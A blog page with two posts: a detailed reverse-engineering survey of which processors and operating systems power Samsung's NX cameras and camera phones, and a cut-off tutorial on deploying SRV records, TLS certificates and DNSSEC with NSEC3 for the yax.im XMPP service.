Things related to communication, networking and the internet.
Many years ago, in the summer of 2014, I fell into the rabbit hole of the Samsung NX(300) mirrorless APS-C camera, found out it runs Tizen Linux, analyzed its WiFi connection, got a root shell and looked at adding features.
Next year, Samsung "quickly adapted to market demands" and abandoned the whole NX ecosystem, but I'm still an active user of the NX500 and the NX mini (for infrared photography). A few months ago, I was triggered to find out which respective framework is powering which of the 19(!!!) NX models that Samsung released between 2010 and 2015. The TL;DR results are documented in the Samsung NX model table, and this post contains more than you ever wanted to know, unless you are a Samsung camera engineer.
Hardware Overview
There is a Wikipedia list of all the released NX models that I took as my starting point. The main product line is centered around the NX mount, and the cameras have a "NXnnnn" numbering scheme, with "nnnn" being a number between one and four digits.
In addition, there is the Galaxy NX, which is an Android phone, but also has the NX mount and a DRIM engine DSP. This fascinating half-smartphone half-camera line began in 2012 with the Galaxy Camera and featured a few Android models with zoom lenses and different camera DSPs.
In 2014, Samsung introduced the NX
mini with a 1" sensor and the
"NX-M" lens mount, sharing much of the architecture with the larger NX models.
In 2015, they announced accidentally leaked the NX mini
2,
based on the DRIMeV SoC and running Linux, and even submitted it to the
FCC, but it never materialized on the market
after Samsung "shifted priorities". If you are the janitor in Samsung's R&D
offices, and you know where all the NX mini 2 prototypes are locked up, or if
you were involved in making them, I'd die to get my hands onto one of them!
Most of the NX cameras are built around different generations of the "DRIM engine" image processor, so it's worth looking at that as well.
The Ukrainian company photo-parts has a rather extensive list of NX model boards, even featuring a few well-made PCB photographs. While their page is quirky, the documentation is excellent and matches my findings. They have documented the DRIMe CPU generation for many, but not for all, NX cameras.
Origins of the DRIM engine
Apparently the first cameras introducing the DRIM engine were the NV30/NV40 in 2008. Going through the service manuals of the NV cameras reveals the following:
- NV30 (the Samsung camera, not the Samsung laptop with the same model number): using the Milbeaut MB91686 image processor introduced in 2006
- NV40: also using the MB91686
- NV24: "TWE (MB91043)"
- NV100 (also called TL34HD in some regions): "DRIM II (MB91043)"
This looks like the DRIM engine is a re-branded Milbeaut MB91686, and the DRIM engine II is a MB91043. Unfortunately, nothing public is known about the latter, and it doesn't look like anybody ever talked about this processor model.
Even more unfortunately, I wasn't able to find a (still working) firmware download for any of those cameras.
Firmware Downloads
Luckily, the firmware situation is better for the NX cameras. To find out more about each of them, I visited the respective Samsung support page and downloaded the latest firmware release. For the Android-based cameras however, firmware images are only available through shady "Samsung fan club" sites.
The first classification was provided by the firmware size, as there were distinct buckets. The first generation, NX5, NX10, and NX11 had (unzipped) sizes of ~15MB, the last generation NX1 and NX500 were beyond 350MB.
Googling for respective NX and "DRIM engine" press releases, PCB photos and other related materials helped identifying the specific generation. Sometimes, there were no press releases mentioning the SoC and I had to resort to PCB photos found online or made by myself or other NX enthusiasts.
Further information was obtained by checking the firmware files with strings
and
binwalk, with the details documented
below.
Note: most firmware files contain debug strings and file paths, often
mentioning the account name of the respective developer. Personal names of
Samsung developers are masked out in this blog post to protect the
guilty innocent.
Mirrorless Cameras
DRIMeII: NX10, NX5, NX11, NX100
The first NX camera released by Samsung was the NX10, so let's look into its
firmware. The ZIP contains an nx10.bin
, and running that through strings
-n 20
still yields some 11K unique entries.
There are no matches for "DRIM", but searching for "version", "revision", and "copyright" yields a few red herrings:
* Powered by [redacted] in DSLR team *
* This version apadpter for NX10 (16MB NOR) *
* Ice Updater v 0.025 (Base on FW Updater) *
* Hermes Firmware Version 0.00.001 (hit Enter for debugger prompt) *
* COPYRIGHT(c) 2008 SYRI *
It's barely possible to find out the details of those names after over a decade, and we still don't know which OS is powering the CPU.
One hint is provided by the source code reference in the binary:
D:\070628_view\NX10_DEV_MAIN\DSLR_PRODUCT\DSP\Project\CSP\..\..\Source\System\CSP\CSP_1.1_Gender\CSP_1.1\uITRON\Include\PCAlarm.h
This seems to be based on a "CSP", and feature "uITRON". The former might be the Samsung Core Software Platform, as identified by the following copyright notice in the firmware file:
Copyright (C) SAMSUNG Electronics Co.,Ltd.
SAMSUNG (R) Core SW Platform 2.0 for CSP 1.1
The latter is µITRON, a Japanese real-time OS specification going back to 1984. So let's assume the first camera generation (everything released in 2010) is powered by µITRON, as NX5, NX10 and NX11 have the same strings in their firmware files.
The NX100 is very similar to the above devices, but its firmware is roughly twice the size, given that it has a 32MB NOR flash (according to the bootloader strings). However, there are only 19MB of non-0x00, non-0xff data, and from comparing the extracted strings no significant new modules could be identified.
None of them identify the DRIM engine generation, but the NX10 service manual labels the CPU as "DSP (DRIMeII Pro)", so probably related to but slightly better than NV100's "DRIM II MB91043". Furthermore, all of these models are documented as "DRIM II" by photo-parts, and there is a well-readable PCB shot of the NX100 saying "DRIM engine IIP".
DRIMeIII: NX200, NX20, NX210, NX1000, NX1100
One year later, in 2011, Samsung released the NX200 powered by DRIM (engine) III. It is followed in 2012 by NX20, NX210, and NX1000/NX1100 (the only difference between the last two is a bundled Adobe Lightroom). The NX20 emphasizes professionalism, and the NX1x00 and NX2x0 stand for compact mobility.
The NX200 firmware also makes a significant leap to 77MB uncompressed, and the following models clock in at around 102MB uncompressed.
Each of the firwmare ZIPs contains two files respectively, named after the
model, e.g. nx200.Rom
and nx200.bin
. Binwalking the Rom
doesn't yield
anything of value, except roughly a dozen of artistic collage background
pictures. strings
confirms that it is some sort of filesystem not
identified by binwalk (and it contains a classical music compilation, with
tracks titled "01_Flohwalzer.mp3" to "20_Spring.mp3", each roughly a minute
long, sounding like ringtones from the 2000s)! The pictures and music files
can be extracted using PhotoRec.
The bin
binwalk yields a few interesting strings though:
8738896 0x855850 Unix path: /opt/windRiver6.6/vxworks-6.6/target/config/comps/src/edrStub.c
...
10172580 0x9B38A4 Copyright string: "Copyright (C) 2011, Arcsoft Inc."
10275754 0x9CCBAA Copyright string: "Copyright (c) 2000-2009 by FotoNation. All rights reserved."
10485554 0x9FFF32 Copyright string: "Copyright Wind River Systems, Inc., 1984-2007"
10495200 0xA024E0 VxWorks WIND kernel version "2.11"
So we have identified the OS as Wind River's VwWorks.
A strings
inspection of the bin
also gives us "ARM DRIMeIII - ARM926E
(ARM)" and "DRIMeIII H.264/AVC Encoder", confirming the SoC generation, weird
network stuff ("ftp password (pw) (blank = use rsh)"), and even some fancy
ASCII art:
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]] ]]]] ]]]]]]]]]] ]] ]]]] (R)
] ]]]]]]]]] ]]]]]] ]]]]]]]] ]] ]]]]
]] ]]]]]]] ]]]]]]]] ]]]]]] ] ]] ]]]]
]]] ]]]]] ] ]]] ] ]]]] ]]] ]]]]]]]]] ]]]] ]] ]]]] ]] ]]]]]
]]]] ]]] ]] ] ]]] ]] ]]]]] ]]]]]] ]] ]]]]]]] ]]]] ]] ]]]]
]]]]] ] ]]]] ]]]]] ]]]]]]]] ]]]] ]] ]]]] ]]]]]]] ]]]]
]]]]]] ]]]]] ]]]]]] ] ]]]]] ]]]] ]] ]]]] ]]]]]]]] ]]]]
]]]]]]] ]]]]] ] ]]]]]] ] ]]] ]]]] ]] ]]]] ]]]] ]]]] ]]]]
]]]]]]]] ]]]]] ]]] ]]]]]]] ] ]]]]]]] ]]]] ]]]] ]]]] ]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Development System
]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]] KERNEL:
]]]]]]]]]]]]]]]]]]]]]]]]] Copyright Wind River Systems, Inc., 1984-2007
The 2012 models (NX20, NX210, NX1000, NX1100) contain the same copyright and CPU identification strings after a cursory look, confirming the same info about the third DRIMe generation.
Side note: there is also a compact camera from early 2010, the WB2000/TL350 (EU/US name), also built around the DRIMeIII and also running VxWorks. It looks like it was developed in parallel to the DRIMeII based NX10!
Another camera based on DRIMeIII and VxWorks is the EX2F from 2012.
DRIMeIV, Tizen Linux: NX300(M), NX310, NX2000, NX30
In early 2013, Samsung gave a CES press conference announcing the DRIMe IV based NX300. Linux was not mentioned, but we got a novelty single-lens 3D feature and an AMOLED screen. Samsung also published a design overview of the NX300 evolution.
I've looked into the NX300 root filesystem back in
2014, and the CPU generation was also
confirmed from /proc/cpuinfo
:
Hardware : Samsung-DRIMeIV-NX300
The NX310 is just an NX300 with additional bundled gimmicks, sharing the same firmware. The actual successor to the NX300 is the NX2000, featuring a large AMOLED and almost no physical buttons (why would anybody buy a camera without knobs and dials?). It's followed by the NX300M (a variant of the NX300 with a 180° tilting screen), and the NX30 (released 2014, a larger variant with eVF and built-in flash).
All of them have similarly sized and named firmware (nx300.bin
), and the
respective OSS downloads feature a TIZEN
folder. All are running Linux
kernel 3.5.0. There is a nice description of the firmware file
structure by
Douglas J. Hickok. The bin
files begin with SLP\x00
, probably for "Samsung
Linux Platform", and thus I documented them as SLP Firmware
Format
and created an SLP firmware
dumper.
Fujitsu M7MU: NX mini, NX3000, NX3300
In the first half of 2014, the NX mini was announced. It also features WiFi and NFC, and with its NX-M mount it is one of the smallest digital interchangeable-lens cameras out there! The editor notes reveal that it's based on the "M7MU" DSP, which unfortunately is impossible to google for.
The firmware archive contains a file called DATANXmini.bin
(which is not the
SLP format and also a break with the old-school 8.3 filename
convention), and it seems to
use some sort of data compression, as most strings are garbled after 16
bytes or earlier (C:\colomia\Gui^@^@Lib\Sources\Core^@^PAllocator.H
, here
using Vim's binary escape notation).
There are a few string matches for "M7MU", but nothing that would reveal details about its manufacturer or operating system. The (garbled) copyright strings give a mixed picture, with mentions of:
- ArcSoft
- FotoNation (face detection?)
- InterNiche Technologies (probably for their IPv4 network stack)
- DigitalOptics Corporation (optical systems)
- Jouni Malinen and contributors, with something that looks like a GPL header(!?!?):
Copyright (c) 2<80>^@^@5-2011, Jouni Ma^@^@linen <*@**.**>
^@^@and contributors^@^B^@This program ^@^Kf^@^@ree software. Yo!
u ^@q dis^C4e it^AF/^@<9c>m^D^@odify^@^Q
under theA^@ P+ms of^B^MGNU Gene^A^@ral Pub^@<bc> License^D^E versPy 2.
This doesn't give us any hints on what is powering this nice curiosity of ILC. The few PCB photos available on the internet have the CPU covered with a sticker, so no dice there either. All of the above similarly applies to the NX3000, which is running very similar code but has the larger NX mount, and the NX3300, which is a slightly modified NX3000 with more selfie shooting and less Adobe Lightroom.
It took me quite a while of fruitless guessing, until I was able to obtain a (broken) NX3000 and disassemble it, just to remove the CPU sticker.
The sticker revealed that the CPU is actually an "MB86S22A", another Fujitsu Milbeaut Image Processor, with M-7M being the seventh generation (not sure about "MU", but there is "MO" for mobile devices), built around the ARM Cortex-A5MP core!
Github code search reveals that there is actually an M7MU driver in the forked Exynos Linux kernel, and it defines the firmware header structure. Let's hack together a header reader in python real quick now, and run that over the NX mini firmware:
Header | Value |
---|---|
block_size | 0x400 (1024) |
writer_load_size | 0x4fc00 (326656) |
write_code_entry | 0x40000400 (1073742848) |
sdram_param_size | 0x90 (144) |
nand_param_size | 0xe1 (225) |
sdram_data | *stripped 144 bytes* |
nand_data | *stripped 225 bytes* |
code_size | 0xafee12 (11529746) |
offset_code | 0x50000 (327680) |
version1 | b0 b1 ae b1 b0 |
log | b2 b0 b1 b5 b0 b1 b1 b6 b2 b1 b1 b9 |
version2 | c7 cc d5 c1 cf c1 b2 |
model | 80 80 80 80 ce d8 cd c9 ce c9 80 80 80 |
section_info | 00000007 00000001 0050e66c 00000002 001a5985 00000003 00000010 00000004 00061d14 00000005 003e89d6 00000006 00000010 00000007 00000010 00000000 9x 00000000 |
pdr | "" |
ddr | 00 b3 3f db 26 02 08 00 d7 31 08 29 01 80 00 7c 8c 07 |
epcr | 00 00 3c db 00 00 08 30 26 00 f8 38 00 00 00 3c 0c 07 |
That was less than informative. At least it's a good hint for loading the firmware into a decompiler, if anybody gets interested enough.
But why should the Linux kernel have a module to talk to an M7MU? One of the
kernel trees containing that code is called kernel_samsung_exynos5260
and the
Exynos 5260 is the SoC powering the Galaxy K
Zoom. So
the K Zoom does have a regular Exynos SoC running Android, and a second
Milbeaut SoC running the image processing. Let's postpone this Android
hybrid for now.
DRIMeV, Tizen Linux: NX1, NX500, Gear360
In late 2014, Samsung released the high-end DRIMeV-based NX1, featuring a backside-illuminated 28 MP sensor and 4K H.256 video in addition to all the features of previous NX models. There was also an interview with a very excited Samsung Senior Marketing Manager that contains PCB shots and technical details. Once again, Linux is only mentioned in third-party coverage, e.g. in the EOSHD review.
In February 2015, the NX1 was followed by the more compact NX500 based around a slightly reduced DRIMeVs SoC. Apparently, the DRIMeVs also powers the Gear 360 camera, and indeed, there is a teardown with PCB shots confirming that and showing an additional MachXO3 FPGA, but also some firmware reverse-engineering as well as firmware mirroring efforts. The Gear360 is running Tizen 2.2.0 "Magnolia" and requires a companion app for most of its functions.
The NX1 is using the same modified version of the SLP firmware format as the
Gear360. In versions before 1.21, the ext4 partitions were uncompressed,
leading to significantly larger bin
file sizes. They still contain Linux
3.5.0 but ext4 is a significant change over the
UBIFS on the DRIMeIV cameras, and
allows in-place modification from a telnet shell.
Android phones with dedicated photo co-processor
Samsung has also experimented with hybrid devices that are neither smartphone nor camera. The first such device seems to be the Galaxy Camera from 2012.
The Android firmware ZIP files (obtained from a Samsung "fan club"
website) contain one or multiple tar.md5
files (which are tar archives with
appended MD5 checksums to be flashed by
Odin).
Galaxy Camera (EK-GC100, EK-GC120)
For the Galaxy Camera EK-GC100, there is a
CODE_GC100XXBLL7_751817_REV00_user_low_ship.tar.md5
in the ZIP, that
contains multiple .img
files:
-rw-r--r-- se.infra/se.infra 887040 2012-12-26 12:12 sboot.bin
-rw-r--r-- se.infra/se.infra 768000 2012-12-26 11:41 param.bin
-rw-r--r-- se.infra/se.infra 159744 2012-12-26 12:12 tz.img
-rw-r--r-- se.infra/se.infra 4980992 2012-12-26 12:12 boot.img
-rw-r--r-- se.infra/se.infra 5691648 2012-12-26 12:12 recovery.img
-rw------- se.infra/se.infra 1125697212 2012-12-26 12:11 system.img
None of these look like camera firmware, but system.img
is the Android
rootfs (A sparse image convertible with
simg2img to obtain an ext4
image). In the rootfs, /vendor/firmware/
contains a few files, including one
fimc_is_fw.bin
with 1.2MB.
The Galaxy Camera Linux source has an Exynos FIMC-IS (Image Subsystem) driver working over I2C, and the firmware itself contains a few interesting strings:
src\FIMCISV15_HWPF\SIRC_SDK\SIRC_Src\ISP_GISP_HQ_ThSc.c
* S5PC220-A5 - Solution F/W *
* since 2010.05.21 for ISP Team *
SIRC-ISP-SDK-R1.02.00
https://svn/svn/SVNRoot/System/Software/tcevb/SDK+FW/branches/Pegasus-2012_01_12-Release
"isp_hardware_version" : "Fimc31"
Furthermore, the firmware bin file seems to start with a typical ARM v7 reset vector table, but other than that it looks like the image processsor is a built-in component of the Exynos4 SoC.
Galaxy S4 Zoom: SM-C1010, SM-C101, SM-C105
The next Android hybrid released by Samsung was the Galaxy S4
Zoom
(SM-C1010, SM-C101, SM-C105) in 2013. In its CODE_[...].tar.md5
firmware, there is an additional 2MB camera.bin
file that contains the
camera processor firmware. Binwalk only reveals a few FotoNation copyright
strings, but strings
gives some more interesting
hints, like:
SOFTUNE REALOS/ARM is REALtime OS for ARM.COPYRIGHT(C) FUJITSU MICROELECTRONICS LIMITED 1999
M9MOFujitsuFMSL
AHFD Face Detection Library M9Mo v.1.0.2.6.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
LibFE M9Mo v.0.2.0.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
FCGK02 Fujitsu M9MO
Softune is an IDE used by Fujitsu and Infineon for embedded processors, featuring the REALOS µITRON real-time OS!
M9MO sounds like a 9th generation Milbeaut image processor, but again there is not much to see without the model number, and it's hard to find good PCB shots without stickers. There is a S4 Zoom disassembly guide featuring quite a few PCB shots, but the top side only shows the Exynos SoC, eMMC flash and an Intel baseband. There are uncovered bottom pics submtted to FCC which are too low-res to identify if there is a dedicated SoC.
As shown above, Samsung has a history of working with Milbeaut and µITRON, so it's probably not a stretch to conclude that this combination powers the S4 Zoom's camera, but it's hard to say if it's a logical core inside the Exynos 4212 or a dedicated chip.
Galaxy NX: EK-GN100, EK-GN120
Just one week after the S4 Zoom, still in June 2013, Samsung announced the Galaxy NX (EK-GN100, EK-GN120) with interchangeable lenses, 20.3MP APS-C sensor, and DRIMeIV SoC - specs already known from January's NX300.
But the Galaxy Zoom is also an Android 4.2 smartphone (even if it lacks microphone and speakers, so technically just a micro-tablet?). How can it be a DRIMeIV Linux device and an Android phone at the same time? The firmware surely will enlighten us!
Similarly to the S4 Zoom, the firmware is a ZIP file containing a
[...]_HOME.tar.md5
. One of the files inside it is camera.bin
, and this
time it's 77MB! This file now features the SLP\x00
header known from the
NX300:
camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
144 5523488 f68a86 ffffffff vImage
5523632 7356 ad4b0983 7fffffff D4_IPL.bin
5530988 63768 3d31ae89 65ffffff D4_PNLBL.bin
5594756 2051280 b8966d27 543fffff uImage
7646036 71565312 4c5a14bc 4321ffff platform.img
The platform.img
file contains a UBIFS root partition, and presumably vImage
is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel
running on the camera SoC. The rootfs is very similar to the NX300 as well,
featuring the same "squeeze/sid" string in /etc/debian_version
, even though
it's again Tizen / Samsung Linux Platform. There is a 500KB
/usr/bin/di-galaxyu-app
that's probably responsible for camera operation
as well as for talking to the Android CPU. Further reverse engineering is
required to understand what kind of IPC mechanism is used between the cores.
The Galaxy NX got the CES 2014 award for the first fully-connected interchangeable lens camera, but probably not for fully-connecting a SoC running Android-flavored Linux with a SoC running Tizen-flavored Linux on the same board.
Galaxy Camera 2
Shortly after the Galaxy NX, the Galaxy Camera 2 (EK-GC200) was announced and presented at CES 2014.
Very similar to the first Galaxy Camera, it has a 1.2MB
/vendor/firmware/fimc_is_fw.bin
file, and also shares most of the strings
with it. Apart from a few changed internal SVN URLs, this seems to be roughly
the same module.
Galaxy K Zoom: SM-C115, SM-C111, SM-C115L
As already identified above, the Galaxy K
Zoom
(SM-C115, SM-C111, SM-C115L), released in June 2014, is using the M7M image
processor. The respective firmware can be found inside the Android rootfs at
/vendor/firmware/RS_M7MU.bin
and is 6.2MB large. It also features the same
compression mechanism as the NX mini firmware, making it harder to analyze,
but the M7MU firmware header looks more consistent:
Header | Value |
---|---|
code_size | 0x5dee12 (6155794) |
offset_code | 0x40000 (262144) |
version1 | "00.01" |
log | "201405289234" |
version2 | "D20FSHE" |
model | "06DAGCM2" |
Conclusion
In just five years, Samsung released eighteen cameras and one smartphone/camera hybrid under the NX label, plus a few more phones with zoom lenses, built around the Fujitsu Milbeaut SoC as well as multiple generations of Samsung's custom-engineered (or maybe initially licensed from Fujitsu?) DRIM engine.
The number of different platforms and overlapping release cycles is a strong indication that the devices were developed by two or three product teams in parallel, or maybe even independently of each other. This engineering effort could have proven a huge success with amateur and professional photographers, if it hadn't been stopped by Samsung management.
To this day, the Tizen-based NX models remain the best trade-off between picture quality and hackability (in the most positive meaning).
(*) All pictures (C) Samsung marketing material
.IM top-level domain Domain Name System Security Extensions Look-aside Validation DNS-based Authentication of Named Entities Extensible Messaging and Presence Protocol TLSA ("TLSA" does not stand for anything; it is just the name of the RRtype) resource record.
Okay, seriously: this post is about securing an XMPP server running on an .IM domain with DNSSEC, using yax.im as a real-life example. In the world of HTTP there is HPKP, and browsers come with a long list of pre-pinned site certificates for the who's'who of the modern web. For XMPP, DNSSEC is the only viable way to extend the broken Root CA trust model with a slightly-less-broken hierarchical trust model from DNS (there is also TACK, which is impossible to deploy because it modifies the TLS protocol, and also unmaintained).
Because the .IM TLD is not DNSSEC-signed yet, we will need to use
DLV (DNSSEC Look-aside Validation), an additional
DNSSEC trust root operated by the ISC (until the end of 2016). Furthermore, we
will need to set up the correct entries for yax.im
(the XMPP service domain),
chat.yax.im
(the conference domain) and xmpp.yaxim.org
(the actual server
running the service).
This post has been sitting in the drafts folder for a while, but now that DANE-SRV has been promoted to Proposed Standard, it was a good time to finalize the article.
Introduction
Our (real-life) scenario is as follows: the yax.im
XMPP service is run on a server named
xmpp.yaxim.org
(for historical reasons, the yax.im
host is a web server
forwarding to yaxim.org
, not the actual XMPP server). The service furthermore
hosts the chat.yax.im
conference service, which needs to be accessible from
other XMPP servers as well.
In the following, we will create
SRV
DNS records
to advertise the server name, obtain a TLS certificate, configure DNSSEC on
both domains and create (signed)
DANE
records that define which certificate a client can expect when connecting.
Once this is deployed, state-level attackers will not be able to MitM users of the service simply by issuing rogue certificates, they would also have to compromise the DNSSEC chain of trust (in our case one of the following: ICANN/VeriSign, DLV, PIR or the registrar/NS hosting our domains, essentially limiting the number of states able to pull this off to one).
Creating SRV Records for XMPP
The service / server separation is made possible with the
SRV
record in DNS, which is a more
generic variant of records like MX
(e-mail server) or NS
(domain name
server) and defines which server is responsible for a given service on a given
domain.
For XMPP, we create the following three SRV records to allow clients
(_xmpp-client._tcp
), servers (_xmpp-server._tcp
) and conference
participants (_xmpp-server._tcp
on chat.yax.im
) to connect to the right
server:
_xmpp-client._tcp.yax.im IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpp-server._tcp.yax.im IN SRV 5 1 5269 xmpp.yaxim.org.
_xmpp-server._tcp.chat.yax.im IN SRV 5 1 5269 xmpp.yaxim.org.
The record syntax is: priority (5
), weight (1
), port (5222
for clients,
5269
for servers) and host (xmpp.yaxim.org
). Priority and weight are used
for load-balancing multiple servers, which we are not using.
Attention: some clients (or their respective DNS resolvers, often hidden
in outdated, cheap, plastic junk routers provided by your "broadband" ISP)
fail to resolve SRV records, and thus fall back to the A
record. If you set
up a new XMPP server, you will slightly improve your availability by ensuring
that the A
record (yax.im
in our case) points to the XMPP server as well.
However, DNSSEC will be even more of a challenge for them, so lets write them
off for now.
Obtaining a TLS Certificate for XMPP
While DANE allows rolling out self-signed certificates, our goal is to stay compatible with clients and servers that do not deploy DNSSEC yet. Therefore, we need a certificate issued by a trustworthy member of the Certificate Extorion ring. Currently, StartSSL and WoSign offer free certificates, and Let's Encrypt is about to launch.
Both StartSSL and WoSign offer a convenient function to generate your keypair. DO NOT USE THAT! Create your own keypair! This "feature" will allow the CA to decrypt your traffic (unless all your clients deploy PFS, which they don't) and only makes sense if the CA is operated by an Intelligence Agency.
What You Ask For...
The certificate we are about to obtain must be somehow tied to our XMPP
service. We have three different names (yax.im
, chat.yax.im
and
xmpp.yaxim.org
) and the obvious question is: which one should be entered into
the certificate request.
Fortunately, this is easy to find out, as it is well-defined in the XMPP Core specification, section 13.7:
In a PKIX certificate to be presented by an XMPP server (i.e., a "server certificate"), the certificate SHOULD include one or more XMPP addresses (i.e., domainparts) associated with XMPP services hosted at the server. The rules and guidelines defined in [TLS‑CERTS] apply to XMPP server certificates, with the following XMPP-specific considerations:
Support for the DNS-ID identifier type [PKIX] is REQUIRED in XMPP client and server software implementations. Certification authorities that issue XMPP-specific certificates MUST support the DNS-ID identifier type. XMPP service providers SHOULD include the DNS-ID identifier type in certificate requests.
Support for the SRV-ID identifier type [PKIX‑SRV] is REQUIRED for XMPP client and server software implementations (for verification purposes XMPP client implementations need to support only the "_xmpp-client" service type, whereas XMPP server implementations need to support both the "_xmpp-client" and "_xmpp-server" service types). Certification authorities that issue XMPP-specific certificates SHOULD support the SRV-ID identifier type. XMPP service providers SHOULD include the SRV-ID identifier type in certificate requests.
[...]
Translated into English, our certificate SHOULD contain yax.im
and
chat.yax.im
according to [TLS-CERTS], which is "Representation and
Verification of Domain-Based Application Service Identity within Internet
Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of
Transport Layer Security (TLS)", or for short
RFC 6125.
There, section 2.1
defines that there is the CN-ID (Common Name, which used to be the only entry
identifying a certificate), one or more DNS-IDs (baseline entries usable for
any services) and one or more SRV-IDs (service-specific entries, e.g. for
XMPP). DNS-IDs and SRV-IDs are stored in the certificate as
subject alternative names (SAN).
Following the above XMPP Core quote, a CA must add support adding a DNS-ID and should add an
SRV-ID field to the certificate. Clients and servers must support both field
types. The SRV-ID is constructed according to
RFC 4985, section 2, where it
is called SRVName:
The SRVName, if present, MUST contain a service name and a domain name in the following form:
_Service.Name
For our XMPP scenario, we would need three SRV-IDs (_xmpp-client.yax.im
for
clients, _xmpp-server.yax.im
for servers, and _xmpp-server.chat.yax.im
for
the conference service; all without the _tcp.
part we had in the SRV
record). In addition, the two DNS-IDs yax.im
and chat.yax.im
are required
recommended by the specification, allowing the certificate to be (ab)used for
HTTPS as well.
Update: The quoted specifications allow to create an XMPP-only certificate based on SRV-IDs, that contains no DNS-IDs (and has a non-hostname CN). Such a certificate could be used to delegate XMPP operations to a third party, or to limit the impact of leaked private keys. However, you will have a hard time convincing a public CA to issue one, and once you get it, it will be refused by most clients due to lack of SRV-ID implementation.
And then there is one more thing.
RFC 7673
proposes also checking the certificate for the SRV
destination
(xmpp.yaxim.org
in our case) if the SRV
record was properly validated,
there is no associated TLSA
record, and the application user was born under
the Virgo zodiac sign.
Summarizing the different possible entries in our certificate, we get the following picture:
Name(s) | Field Type | Meaning |
---|---|---|
yax.im or chat.yax.im |
Common Name (CN) | Legacy name for really old clients and servers. |
yax.im chat.yax.im |
DNS-IDs (SAN) | Required entry telling us that the host serves anything on the two domain names. |
_xmpp-client.yax.im _xmpp-server.yax.im |
SRV-IDs (SAN) | Optional entry telling us that the host serves XMPP to clients and servers. |
_xmpp-server.chat.yax.im |
SRV-ID (SAN) | Optional entry telling us that the host serves XMPP to servers for chat.yax.im . |
xmpp.yaxim.org |
DNS-ID or CN | Optional entry if you can configure a DNSSEC-signed SRV record but not a TLSA record. |
...and What You Actually Get
Most CAs have no way to define special field types. You provide a list of
service/host names, the first one is set as the CN, and all of them are stored
as DNS-ID SANs. However, StartSSL offers "XMPP Certificates", which look like
they might do what we want above. Let's request one from them for yax.im
and
chat.yax.im
and see what we got:
openssl x509 -noout -text -in yaxim.crt
[...]
Subject: description=mjp74P5w0cpIUITY, C=DE, CN=chat.yax.im/emailAddress=hostmaster@yax.im
X509v3 Subject Alternative Name:
DNS:chat.yax.im, DNS:yax.im, othername:<unsupported>,
othername:<unsupported>, othername:<unsupported>, othername:<unsupported>
So it's othername:<unsupported>
, then? Thank you OpenSSL, for your
openness! From RFC 4985 we know that "othername" is the basic type of the
SRV-ID SAN, so it looks like we got something more or less correct. Using
this script
(highlighted source, thanks Zash), we
can further analyze what we've got:
Extensions:
X509v3 Subject Alternative Name:
sRVName: chat.yax.im, yax.im
xmppAddr: chat.yax.im, yax.im
dNSName: chat.yax.im, yax.im
Alright, the two service names we submitted turned out under three different field types:
- SRV-ID (it's mising the
_xmpp-client.
/_xmpp-server.
part and is thus invalid) - xmppAddr (this was the correct entry type in the deprecated RFC 3920 XMPP specification, but is now only allowed in client certificates)
- DNS-ID (wow, these ones happen to be correct!)
While this is not quite what we wanted, it is sufficient to allow a correctly implemented client to connect to our server, without raising certificate errors.
Configuring DNSSEC for Your Domain(s)
In the next step, the domain (in our case both yax.im
and yaxim.org
, but
the following examples will only list yax.im
) needs to be signed with DNSSEC.
Because I'm a lazy guy, I'm using BIND 9.9, which does inline-signing (all I
need to do is create some keys and enable the feature).
Key Creation with BIND 9.9
For each domain, a zone signing key (ZSK) is needed to sign the individual records. Furthermore, a key signing key (KSK) should be created to sign the ZSK. This allows you to rotate the ZSK as often as you wish.
# create key directory
mkdir /etc/bind/keys
cd /etc/bind/keys
# create key signing key
dnssec-keygen -f KSK -3 -a RSASHA256 -b 2048 yax.im
# create zone signing key
dnssec-keygen -3 -a RSASHA256 -b 2048 yax.im
# make all keys readable by BIND
chown -R bind.bind .
To enable it, you need to configure the key directory, inline signing and automatic re-signing:
zone "yax.im" {
...
key-directory "/etc/bind/keys";
inline-signing yes;
auto-dnssec maintain;
};
After reloading the config, the keys need to be enabled in BIND:
# load keys and check if they are enabled
$ rndc loadkeys yax.im
$ rndc signing -list yax.im
Done signing with key 17389/RSASHA256
Done signing with key 24870/RSASHA256
The above steps need to be performed for yaxim.org
as well.
NSEC3 Against Zone Walking
Finally, we also want to enable NSEC3 to prevent curious people from "walking the zone", i.e. retrieving a full list of all host names under our domains. To accomplish that, we need to specify some parameters for hashing names. These parameters will be published in an NSEC3PARAMS record, which resolvers can use to apply the same hashing mechanism as we do.
First, the hash function to be used. RFC 5155, section 4.1 tells us that...
"The acceptable values are the same as the corresponding field in the NSEC3 RR."
NSEC3 is also defined in RFC 5155, albeit in section 3.1.1. There, we learn that...
"The values for this field are defined in the NSEC3 hash algorithm registry defined in Section 11."
It's right there... at the end of the section:
Finally, this document creates a new IANA registry for NSEC3 hash algorithms. This registry is named "DNSSEC NSEC3 Hash Algorithms". The initial contents of this registry are:
0 is Reserved.
1 is SHA-1.
2-255 Available for assignment.
Let's pick 1
from this plethora of choices, then.
The second parameter is "Flags", which is also defined in Section 11, and must
be 0
for now (other values have to be defined yet).
The third parameter is the number of iterations for the hash function. For a
2048 bit key, it MUST NOT exceed 500.
Bind defaults to 10
,
Strotman
references 330
from RFC 4641bis, but it seems that number was removed since
then. We take this number anyway.
The last parameter is a salt for the hash function (a random hexadecimal string, we use 8 bytes). You should not copy the value from another domain to prevent rainbow attacks, but there is no need to make this very secret.
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yaxim.org
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yax.im
Whenever you update the NSEC3PARAM
value, your zone will be re-signed and
re-published. That means you can change the iteration count and salt value
later on, if the need should arise.
